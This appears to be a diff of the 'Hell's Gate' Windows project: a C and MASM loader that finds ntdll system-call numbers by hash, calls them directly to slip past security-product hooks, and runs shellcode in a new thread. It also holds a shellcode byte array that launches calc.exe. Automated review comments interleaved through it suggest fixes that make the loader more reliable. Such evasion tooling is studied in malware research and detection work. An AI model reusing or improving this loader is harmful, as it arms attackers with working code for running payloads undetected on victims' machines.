||||||
|
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
|
||||||
|
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
|
||||||
|
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
|
||||||
|
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
|
||||||
|
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
|
||||||
|
"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
|
||||||
|
"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
|
||||||
|
"\x63\x2e\x65\x78\x65\x00";
|
||||||
|
|
||||||
|
DWORD ShellcodeLength = sizeof(Shellcode);
|
||||||
|
|
||||||
|
extern BOOL HellsGate(void);
|
||||||
|
|
||||||
|
INT wmain() {
|
||||||
|
|
||||||
|
BOOL a = HellsGate();
|
||||||
|
|
||||||
|
}
|
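Review bot: `DWORD ShellcodeLength = sizeof(Shellcode);` defines a 32-bit object, but HELLSGATE.ASM declares it `extern ShellcodeLength: QWORD` and reads it with 64-bit loads (`mov r10, ShellcodeLength`, `mov rcx, ShellcodeLength`), so the upper four bytes of the length are whatever the linker places after the variable; declare it with a 64-bit type, `SIZE_T ShellcodeLength = sizeof(Shellcode);`, so both sides agree. `wmain` is declared `INT` but falls off the end without a `return`, and the result stored in `a` is never examined; `return a ? 0 : 1;` would make the exit status reflect the outcome. The header comment also carries `@data` for `@date`, `extractingand` and `https ://`, which look like paste damage.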
31
Hells Gate/C Implementation/HellsGate.sln
Normal file
31
Hells Gate/C Implementation/HellsGate.sln
Normal file
@ -0,0 +1,31 @@
|
|||||||
|
|
||||||
|
Microsoft Visual Studio Solution File, Format Version 12.00
|
||||||
|
# Visual Studio Version 16
|
||||||
|
VisualStudioVersion = 16.0.30114.105
|
||||||
|
MinimumVisualStudioVersion = 10.0.40219.1
|
||||||
|
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HellsGate", "HellsGate\HellsGate.vcxproj", "{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}"
|
||||||
|
EndProject
|
||||||
|
Global
|
||||||
|
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||||
|
Debug|x64 = Debug|x64
|
||||||
|
Debug|x86 = Debug|x86
|
||||||
|
Release|x64 = Release|x64
|
||||||
|
Release|x86 = Release|x86
|
||||||
|
EndGlobalSection
|
||||||
|
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
||||||
|
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x64.ActiveCfg = Debug|x64
|
||||||
|
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x64.Build.0 = Debug|x64
|
||||||
|
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x86.ActiveCfg = Debug|Win32
|
||||||
|
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x86.Build.0 = Debug|Win32
|
||||||
|
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x64.ActiveCfg = Release|x64
|
||||||
|
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x64.Build.0 = Release|x64
|
||||||
|
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x86.ActiveCfg = Release|Win32
|
||||||
|
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x86.Build.0 = Release|Win32
|
||||||
|
EndGlobalSection
|
||||||
|
GlobalSection(SolutionProperties) = preSolution
|
||||||
|
HideSolutionNode = FALSE
|
||||||
|
EndGlobalSection
|
||||||
|
GlobalSection(ExtensibilityGlobals) = postSolution
|
||||||
|
SolutionGuid = {AAAFFDAB-0074-4A3D-BA5B-63F51AA7F8EB}
|
||||||
|
EndGlobalSection
|
||||||
|
EndGlobal
|
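--- a/Hells Gate/C Implementation/HellsGate/HellsGate.vcxproj
+++ b/Hells Gate/C Implementation/HellsGate/HellsGate.vcxproj
@@ -0,0 +1,161 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+<ItemGroup Label="ProjectConfigurations">
+<ProjectConfiguration Include="Debug|Win32">
+<Configuration>Debug</Configuration>
+<Platform>Win32</Platform>
+</ProjectConfiguration>
+<ProjectConfiguration Include="Release|Win32">
+<Configuration>Release</Configuration>
+<Platform>Win32</Platform>
+</ProjectConfiguration>
+<ProjectConfiguration Include="Debug|x64">
+<Configuration>Debug</Configuration>
+<Platform>x64</Platform>
+</ProjectConfiguration>
+<ProjectConfiguration Include="Release|x64">
+<Configuration>Release</Configuration>
+<Platform>x64</Platform>
+</ProjectConfiguration>
+</ItemGroup>
+<PropertyGroup Label="Globals">
+<VCProjectVersion>16.0</VCProjectVersion>
+<Keyword>Win32Proj</Keyword>
+<ProjectGuid>{dc6187cb-d5df-4973-84a2-f92aae90cda9}</ProjectGuid>
+<RootNamespace>HellsGate</RootNamespace>
+<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
+</PropertyGroup>
+<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+<ConfigurationType>Application</ConfigurationType>
+<UseDebugLibraries>true</UseDebugLibraries>
+<PlatformToolset>v142</PlatformToolset>
+<CharacterSet>Unicode</CharacterSet>
+<SpectreMitigation>false</SpectreMitigation>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+<ConfigurationType>Application</ConfigurationType>
+<UseDebugLibraries>false</UseDebugLibraries>
+<PlatformToolset>v142</PlatformToolset>
+<WholeProgramOptimization>true</WholeProgramOptimization>
+<CharacterSet>Unicode</CharacterSet>
+<SpectreMitigation>false</SpectreMitigation>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+<ConfigurationType>Application</ConfigurationType>
+<UseDebugLibraries>true</UseDebugLibraries>
+<PlatformToolset>v142</PlatformToolset>
+<CharacterSet>Unicode</CharacterSet>
+<SpectreMitigation>false</SpectreMitigation>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+<ConfigurationType>Application</ConfigurationType>
+<UseDebugLibraries>false</UseDebugLibraries>
+<PlatformToolset>v142</PlatformToolset>
+<WholeProgramOptimization>true</WholeProgramOptimization>
+<CharacterSet>Unicode</CharacterSet>
+<SpectreMitigation>false</SpectreMitigation>
+</PropertyGroup>
+<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+<ImportGroup Label="ExtensionSettings">
+<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
+</ImportGroup>
+<ImportGroup Label="Shared">
+</ImportGroup>
+<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+</ImportGroup>
+<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+</ImportGroup>
+<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+</ImportGroup>
+<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+</ImportGroup>
+<PropertyGroup Label="UserMacros" />
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+<LinkIncremental>true</LinkIncremental>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+<LinkIncremental>false</LinkIncremental>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+<LinkIncremental>true</LinkIncremental>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+<LinkIncremental>false</LinkIncremental>
+</PropertyGroup>
+<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+<ClCompile>
+<WarningLevel>Level3</WarningLevel>
+<SDLCheck>true</SDLCheck>
+<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+<ConformanceMode>true</ConformanceMode>
+</ClCompile>
+<Link>
+<SubSystem>Console</SubSystem>
+<GenerateDebugInformation>true</GenerateDebugInformation>
+</Link>
+</ItemDefinitionGroup>
+<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+<ClCompile>
+<WarningLevel>Level3</WarningLevel>
+<FunctionLevelLinking>true</FunctionLevelLinking>
+<IntrinsicFunctions>true</IntrinsicFunctions>
+<SDLCheck>true</SDLCheck>
+<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+<ConformanceMode>true</ConformanceMode>
+</ClCompile>
+<Link>
+<SubSystem>Console</SubSystem>
+<EnableCOMDATFolding>true</EnableCOMDATFolding>
+<OptimizeReferences>true</OptimizeReferences>
+<GenerateDebugInformation>true</GenerateDebugInformation>
+</Link>
+</ItemDefinitionGroup>
+<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+<ClCompile>
+<WarningLevel>Level3</WarningLevel>
+<SDLCheck>true</SDLCheck>
+<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+<ConformanceMode>true</ConformanceMode>
+</ClCompile>
+<Link>
+<SubSystem>Console</SubSystem>
+<GenerateDebugInformation>true</GenerateDebugInformation>
+</Link>
+</ItemDefinitionGroup>
+<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+<ClCompile>
+<WarningLevel>Level3</WarningLevel>
+<FunctionLevelLinking>true</FunctionLevelLinking>
+<IntrinsicFunctions>true</IntrinsicFunctions>
+<SDLCheck>true</SDLCheck>
+<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+<ConformanceMode>true</ConformanceMode>
+</ClCompile>
+<Link>
+<SubSystem>Console</SubSystem>
+<EnableCOMDATFolding>true</EnableCOMDATFolding>
+<OptimizeReferences>true</OptimizeReferences>
+<GenerateDebugInformation>true</GenerateDebugInformation>
+</Link>
+</ItemDefinitionGroup>
+<ItemGroup>
+<ClCompile Include="main.c" />
+</ItemGroup>
+<ItemGroup>
+<ClInclude Include="structs.h" />
+</ItemGroup>
+<ItemGroup>
+<MASM Include="hellsgate.asm">
+<FileType>Document</FileType>
+</MASM>
+</ItemGroup>
+<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+<ImportGroup Label="ExtensionTargets">
+<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
+</ImportGroup>
+</Project>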
@ -0,0 +1,32 @@
|
|||||||
|
<?xml version="1.0" encoding="utf-8"?>
|
||||||
|
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||||
|
<ItemGroup>
|
||||||
|
<Filter Include="Source Files">
|
||||||
|
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
|
||||||
|
<Extensions>cpp;c;cc;cxx;c++;def;odl;idl;hpj;bat;asm;asmx</Extensions>
|
||||||
|
</Filter>
|
||||||
|
<Filter Include="Header Files">
|
||||||
|
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
|
||||||
|
<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
|
||||||
|
</Filter>
|
||||||
|
<Filter Include="Resource Files">
|
||||||
|
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
|
||||||
|
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
|
||||||
|
</Filter>
|
||||||
|
</ItemGroup>
|
||||||
|
<ItemGroup>
|
||||||
|
<ClCompile Include="main.c">
|
||||||
|
<Filter>Source Files</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
</ItemGroup>
|
||||||
|
<ItemGroup>
|
||||||
|
<ClInclude Include="structs.h">
|
||||||
|
<Filter>Header Files</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
</ItemGroup>
|
||||||
|
<ItemGroup>
|
||||||
|
<MASM Include="hellsgate.asm">
|
||||||
|
<Filter>Source Files</Filter>
|
||||||
|
</MASM>
|
||||||
|
</ItemGroup>
|
||||||
|
</Project>
|
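--- a/Hells Gate/C Implementation/HellsGate/hellsgate.asm
+++ b/Hells Gate/C Implementation/HellsGate/hellsgate.asm
@@ -0,0 +1,23 @@
+; Hell's Gate
+; Dynamic system call invocation
+;
+; by smelly__vx (@RtlMateusz) and am0nsec (@am0nsec)
+
+.data
+wSystemCall DWORD 000h
+
+.code
+HellsGate PROC
+mov wSystemCall, 000h
+mov wSystemCall, ecx
+ret
+HellsGate ENDP
+
+HellDescent PROC
+mov r10, rcx
+mov eax, wSystemCall
+
+syscall
+ret
+HellDescent ENDP
+end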
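Review bot: `mov wSystemCall, ecx` in HellsGate stores all 32 bits of ecx, but main.c declares the argument as `WORD wSystemCall` and the Microsoft x64 ABI does not require the caller to zero the upper bits of a narrow integer argument, so `mov eax, wSystemCall` in HellDescent can load stray high bits into the system-call number. `movzx eax, cx` followed by `mov wSystemCall, eax` (or declaring `wSystemCall WORD` and loading it with `movzx eax, wSystemCall`) pins the value to 16 bits. The preceding `mov wSystemCall, 000h` is a dead store and can be dropped. A header comment on HellDescent would also help, along the lines of `; In: rcx..r9 and stack args pass through unchanged; wSystemCall must be set by HellsGate first. Clobbers: rax, rcx, r10, r11`, and it is worth noting there that the `.data` global makes the HellsGate/HellDescent pair non-reentrant.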
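--- a/Hells Gate/C Implementation/HellsGate/main.c
+++ b/Hells Gate/C Implementation/HellsGate/main.c
@@ -0,0 +1,211 @@
+#pragma once
+#include <Windows.h>
+#include "structs.h"
+
+/*--------------------------------------------------------------------
+VX Tables
+--------------------------------------------------------------------*/
+typedef struct _VX_TABLE_ENTRY {
+PVOID pAddress;
+DWORD64 dwHash;
+WORD wSystemCall;
+} VX_TABLE_ENTRY, * PVX_TABLE_ENTRY;
+
+typedef struct _VX_TABLE {
+VX_TABLE_ENTRY NtAllocateVirtualMemory;
+VX_TABLE_ENTRY NtProtectVirtualMemory;
+VX_TABLE_ENTRY NtCreateThreadEx;
+VX_TABLE_ENTRY NtWaitForSingleObject;
+} VX_TABLE, * PVX_TABLE;
+
+/*--------------------------------------------------------------------
+Function prototypes.
+--------------------------------------------------------------------*/
+PTEB RtlGetThreadEnvironmentBlock();
+BOOL GetImageExportDirectory(
+_In_ PVOID pModuleBase,
+_Out_ PIMAGE_EXPORT_DIRECTORY* ppImageExportDirectory
+);
+BOOL GetVxTableEntry(
+_In_ PVOID pModuleBase,
+_In_ PIMAGE_EXPORT_DIRECTORY pImageExportDirectory,
+_In_ PVX_TABLE_ENTRY pVxTableEntry
+);
+BOOL Payload(
+_In_ PVX_TABLE pVxTable
+);
+PVOID VxMoveMemory(
+_Inout_ PVOID dest,
+_In_ const PVOID src,
+_In_ SIZE_T len
+);
+
+/*--------------------------------------------------------------------
+External functions' prototype.
+--------------------------------------------------------------------*/
+extern VOID HellsGate(WORD wSystemCall);
+extern HellDescent();
+
+INT wmain() {
+PTEB pCurrentTeb = RtlGetThreadEnvironmentBlock();
+PPEB pCurrentPeb = pCurrentTeb->ProcessEnvironmentBlock;
+if (!pCurrentPeb || !pCurrentTeb || pCurrentPeb->OSMajorVersion != 0xA)
+return 0x1;
+
+// Get NTDLL module
+PLDR_DATA_TABLE_ENTRY pLdrDataEntry = (PLDR_DATA_TABLE_ENTRY)((PBYTE)pCurrentPeb->LoaderData->InMemoryOrderModuleList.Flink->Flink - 0x10);
+
+// Get the EAT of NTDLL
+PIMAGE_EXPORT_DIRECTORY pImageExportDirectory = NULL;
+if (!GetImageExportDirectory(pLdrDataEntry->DllBase, &pImageExportDirectory) || pImageExportDirectory == NULL)
+return 0x01;
+
+VX_TABLE Table = { 0 };
+Table.NtAllocateVirtualMemory.dwHash = 0xf5bd373480a6b89b;
+if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtAllocateVirtualMemory))
+return 0x1;
+
+Table.NtCreateThreadEx.dwHash = 0x64dc7db288c5015f;
+if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtCreateThreadEx))
+return 0x1;
+
+Table.NtProtectVirtualMemory.dwHash = 0x858bcb1046fb6a37;
+if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtProtectVirtualMemory))
+return 0x1;
+
+Table.NtWaitForSingleObject.dwHash = 0xc6a2fa174e551bcb;
+if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtWaitForSingleObject))
+return 0x1;
+
+Payload(&Table);
+return 0x00;
+}
+
+PTEB RtlGetThreadEnvironmentBlock() {
+#if _WIN64
+return (PTEB)__readgsqword(0x30);
+#else
+return (PTEB)__readfsdword(0x16);
+#endif
+}
+
+DWORD64 djb2(PBYTE str) {
+DWORD64 dwHash = 0x7734773477347734;
+INT c;
+
+while (c = *str++)
+dwHash = ((dwHash << 0x5) + dwHash) + c;
+
+return dwHash;
+}
+
+BOOL GetImageExportDirectory(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY* ppImageExportDirectory) {
+// Get DOS header
+PIMAGE_DOS_HEADER pImageDosHeader = (PIMAGE_DOS_HEADER)pModuleBase;
+if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
+return FALSE;
+}
+
+// Get NT headers
+PIMAGE_NT_HEADERS pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)pModuleBase + pImageDosHeader->e_lfanew);
+if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE) {
+return FALSE;
+}
+
+// Get the EAT
+*ppImageExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)pModuleBase + pImageNtHeaders->OptionalHeader.DataDirectory[0].VirtualAddress);
+return TRUE;
+}
+
+BOOL GetVxTableEntry(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY pImageExportDirectory, PVX_TABLE_ENTRY pVxTableEntry) {
+PDWORD pdwAddressOfFunctions = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfFunctions);
+PDWORD pdwAddressOfNames = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNames);
+PWORD pwAddressOfNameOrdinales = (PWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNameOrdinals);
+
+for (WORD cx = 0; cx < pImageExportDirectory->NumberOfNames; cx++) {
+PCHAR pczFunctionName = (PCHAR)((PBYTE)pModuleBase + pdwAddressOfNames[cx]);
+PVOID pFunctionAddress = (PBYTE)pModuleBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];
+
+if (djb2(pczFunctionName) == pVxTableEntry->dwHash) {
+pVxTableEntry->pAddress = pFunctionAddress;
+
+// Quick and dirty fix in case the function has been hooked
+WORD cw = 0;
+while (TRUE) {
+// check if syscall, in this case we are too far
+if (*((PBYTE)pFunctionAddress + cw) == 0x0f && *((PBYTE)pFunctionAddress + cw + 1) == 0x05)
+return FALSE;
+
+// check if ret, in this case we are also probaly too far
+if (*((PBYTE)pFunctionAddress + cw) == 0xc3)
+return FALSE;
+
+// First opcodes should be :
+// MOV R10, RCX
+// MOV RCX, <syscall>
+if (*((PBYTE)pFunctionAddress + cw) == 0x4c
+&& *((PBYTE)pFunctionAddress + 1 + cw) == 0x8b
+&& *((PBYTE)pFunctionAddress + 2 + cw) == 0xd1
+&& *((PBYTE)pFunctionAddress + 3 + cw) == 0xb8
+&& *((PBYTE)pFunctionAddress + 6 + cw) == 0x00
+&& *((PBYTE)pFunctionAddress + 7 + cw) == 0x00) {
+BYTE high = *((PBYTE)pFunctionAddress + 5 + cw);
+BYTE low = *((PBYTE)pFunctionAddress + 4 + cw);
+pVxTableEntry->wSystemCall = (high << 8) | low;
+break;
+}
+
+cw++;
+};
+}
+}
+
+return TRUE;
+}
+
+BOOL Payload(PVX_TABLE pVxTable) {
+NTSTATUS status = 0x00000000;
+char shellcode[] = "\x90\x90\x90\x90\xcc\xcc\xcc\xcc\xc3";
+
+// Allocate memory for the shellcode
+PVOID lpAddress = NULL;
+SIZE_T sDataSize = sizeof(shellcode);
+HellsGate(pVxTable->NtAllocateVirtualMemory.wSystemCall);
+status = HellDescent((HANDLE)-1, &lpAddress, 0, &sDataSize, MEM_COMMIT, PAGE_READWRITE);
+
+// Write Memory
+VxMoveMemory(lpAddress, shellcode, sizeof(shellcode));
+
+// Change page permissions
+ULONG ulOldProtect = 0;
+HellsGate(pVxTable->NtProtectVirtualMemory.wSystemCall);
+status = HellDescent((HANDLE)-1, &lpAddress, &sDataSize, PAGE_EXECUTE_READ, &ulOldProtect);
+
+// Create thread
+HANDLE hHostThread = INVALID_HANDLE_VALUE;
+HellsGate(pVxTable->NtCreateThreadEx.wSystemCall);
+status = HellDescent(&hHostThread, 0x1FFFFF, NULL, (HANDLE)-1, (LPTHREAD_START_ROUTINE)lpAddress, NULL, FALSE, NULL, NULL, NULL, NULL);
+
+// Wait for 1 seconds
+LARGE_INTEGER Timeout;
+Timeout.QuadPart = -10000000;
+HellsGate(pVxTable->NtWaitForSingleObject.wSystemCall);
+status = HellDescent(hHostThread, FALSE, &Timeout);
+
+return TRUE;
+}
+
+PVOID VxMoveMemory(PVOID dest, const PVOID src, SIZE_T len) {
+char* d = dest;
+const char* s = src;
+if (d < s)
+while (len--)
+*d++ = *s++;
+else {
+char* lasts = s + (len - 1);
+char* lastd = d + (len - 1);
+while (len--)
+*lastd-- = *lasts--;
+}
+return dest;
+}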
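Review bot: GetVxTableEntry returns TRUE even when no export name hashes to `pVxTableEntry->dwHash`, because the `for` loop falls through to the trailing `return TRUE;`, so wmain carries on with `pAddress == NULL` and `wSystemCall == 0` despite checking the return value. Moving the success return into the match branch (`return TRUE;` in place of `break;`) and changing the trailing statement to `return FALSE;` gives callers the check they already perform. Related: Payload assigns every HellDescent result to `status` but never inspects it, so a failed NtAllocateVirtualMemory leaves `lpAddress` NULL before VxMoveMemory writes through it, and `hHostThread` is never closed. Separately, the x86 branch of RtlGetThreadEnvironmentBlock reads `fs:[0x16]`; the TEB self-pointer (NT_TIB.Self) is at offset 0x18, so that should read `return (PTEB)__readfsdword(0x18);`.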
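--- a/Hells Gate/C Implementation/HellsGate/structs.h
+++ b/Hells Gate/C Implementation/HellsGate/structs.h
@@ -0,0 +1,337 @@
+#pragma once
+#include <Windows.h>
+
+/*--------------------------------------------------------------------
+STRUCTURES
+--------------------------------------------------------------------*/
+typedef struct _LSA_UNICODE_STRING {
+USHORT Length;
+USHORT MaximumLength;
+PWSTR Buffer;
+} LSA_UNICODE_STRING, * PLSA_UNICODE_STRING, UNICODE_STRING, * PUNICODE_STRING, * PUNICODE_STR;
+
+typedef struct _LDR_MODULE {
+LIST_ENTRY InLoadOrderModuleList;
+LIST_ENTRY InMemoryOrderModuleList;
+LIST_ENTRY InInitializationOrderModuleList;
+PVOID BaseAddress;
+PVOID EntryPoint;
+ULONG SizeOfImage;
+UNICODE_STRING FullDllName;
+UNICODE_STRING BaseDllName;
+ULONG Flags;
+SHORT LoadCount;
+SHORT TlsIndex;
+LIST_ENTRY HashTableEntry;
+ULONG TimeDateStamp;
+} LDR_MODULE, * PLDR_MODULE;
+
+typedef struct _PEB_LDR_DATA {
+ULONG Length;
+ULONG Initialized;
+PVOID SsHandle;
+LIST_ENTRY InLoadOrderModuleList;
+LIST_ENTRY InMemoryOrderModuleList;
+LIST_ENTRY InInitializationOrderModuleList;
+} PEB_LDR_DATA, * PPEB_LDR_DATA;
+
+typedef struct _PEB {
+BOOLEAN InheritedAddressSpace;
+BOOLEAN ReadImageFileExecOptions;
+BOOLEAN BeingDebugged;
+BOOLEAN Spare;
+HANDLE Mutant;
+PVOID ImageBase;
+PPEB_LDR_DATA LoaderData;
+PVOID ProcessParameters;
+PVOID SubSystemData;
+PVOID ProcessHeap;
+PVOID FastPebLock;
+PVOID FastPebLockRoutine;
+PVOID FastPebUnlockRoutine;
+ULONG EnvironmentUpdateCount;
+PVOID* KernelCallbackTable;
+PVOID EventLogSection;
+PVOID EventLog;
+PVOID FreeList;
+ULONG TlsExpansionCounter;
+PVOID TlsBitmap;
+ULONG TlsBitmapBits[0x2];
+PVOID ReadOnlySharedMemoryBase;
+PVOID ReadOnlySharedMemoryHeap;
+PVOID* ReadOnlyStaticServerData;
+PVOID AnsiCodePageData;
+PVOID OemCodePageData;
+PVOID UnicodeCaseTableData;
+ULONG NumberOfProcessors;
+ULONG NtGlobalFlag;
+BYTE Spare2[0x4];
+LARGE_INTEGER CriticalSectionTimeout;
+ULONG HeapSegmentReserve;
+ULONG HeapSegmentCommit;
+ULONG HeapDeCommitTotalFreeThreshold;
+ULONG HeapDeCommitFreeBlockThreshold;
+ULONG NumberOfHeaps;
+ULONG MaximumNumberOfHeaps;
+PVOID** ProcessHeaps;
+PVOID GdiSharedHandleTable;
+PVOID ProcessStarterHelper;
+PVOID GdiDCAttributeList;
+PVOID LoaderLock;
+ULONG OSMajorVersion;
+ULONG OSMinorVersion;
+ULONG OSBuildNumber;
+ULONG OSPlatformId;
+ULONG ImageSubSystem;
+ULONG ImageSubSystemMajorVersion;
+ULONG ImageSubSystemMinorVersion;
+ULONG GdiHandleBuffer[0x22];
+ULONG PostProcessInitRoutine;
+ULONG TlsExpansionBitmap;
+BYTE TlsExpansionBitmapBits[0x80];
+ULONG SessionId;
+} PEB, * PPEB;
+
+typedef struct __CLIENT_ID {
+HANDLE UniqueProcess;
+HANDLE UniqueThread;
+} CLIENT_ID, * PCLIENT_ID;
+
+typedef struct _TEB_ACTIVE_FRAME_CONTEXT {
+ULONG Flags;
+PCHAR FrameName;
+} TEB_ACTIVE_FRAME_CONTEXT, * PTEB_ACTIVE_FRAME_CONTEXT;
+
+typedef struct _TEB_ACTIVE_FRAME {
+ULONG Flags;
+struct _TEB_ACTIVE_FRAME* Previous;
+PTEB_ACTIVE_FRAME_CONTEXT Context;
+} TEB_ACTIVE_FRAME, * PTEB_ACTIVE_FRAME;
+
+typedef struct _GDI_TEB_BATCH {
+ULONG Offset;
+ULONG HDC;
+ULONG Buffer[310];
+} GDI_TEB_BATCH, * PGDI_TEB_BATCH;
+
+typedef PVOID PACTIVATION_CONTEXT;
+
+typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME {
+struct __RTL_ACTIVATION_CONTEXT_STACK_FRAME* Previous;
+PACTIVATION_CONTEXT ActivationContext;
+ULONG Flags;
+} RTL_ACTIVATION_CONTEXT_STACK_FRAME, * PRTL_ACTIVATION_CONTEXT_STACK_FRAME;
+
+typedef struct _ACTIVATION_CONTEXT_STACK {
+PRTL_ACTIVATION_CONTEXT_STACK_FRAME ActiveFrame;
+LIST_ENTRY FrameListCache;
+ULONG Flags;
+ULONG NextCookieSequenceNumber;
+ULONG StackId;
+} ACTIVATION_CONTEXT_STACK, * PACTIVATION_CONTEXT_STACK;
+
+typedef struct _TEB {
+NT_TIB NtTib;
+PVOID EnvironmentPointer;
+CLIENT_ID ClientId;
+PVOID ActiveRpcHandle;
+PVOID ThreadLocalStoragePointer;
+PPEB ProcessEnvironmentBlock;
+ULONG LastErrorValue;
+ULONG CountOfOwnedCriticalSections;
+PVOID CsrClientThread;
+PVOID Win32ThreadInfo;
+ULONG User32Reserved[26];
+ULONG UserReserved[5];
+PVOID WOW32Reserved;
+LCID CurrentLocale;
+ULONG FpSoftwareStatusRegister;
+PVOID SystemReserved1[54];
+LONG ExceptionCode;
+#if (NTDDI_VERSION >= NTDDI_LONGHORN)
+PACTIVATION_CONTEXT_STACK* ActivationContextStackPointer;
+UCHAR SpareBytes1[0x30 - 3 * sizeof(PVOID)];
+ULONG TxFsContext;
+#elif (NTDDI_VERSION >= NTDDI_WS03)
+PACTIVATION_CONTEXT_STACK ActivationContextStackPointer;
+UCHAR SpareBytes1[0x34 - 3 * sizeof(PVOID)];
+#else
+ACTIVATION_CONTEXT_STACK ActivationContextStack;
+UCHAR SpareBytes1[24];
+#endif
+GDI_TEB_BATCH GdiTebBatch;
+CLIENT_ID RealClientId;
+PVOID GdiCachedProcessHandle;
+ULONG GdiClientPID;
+ULONG GdiClientTID;
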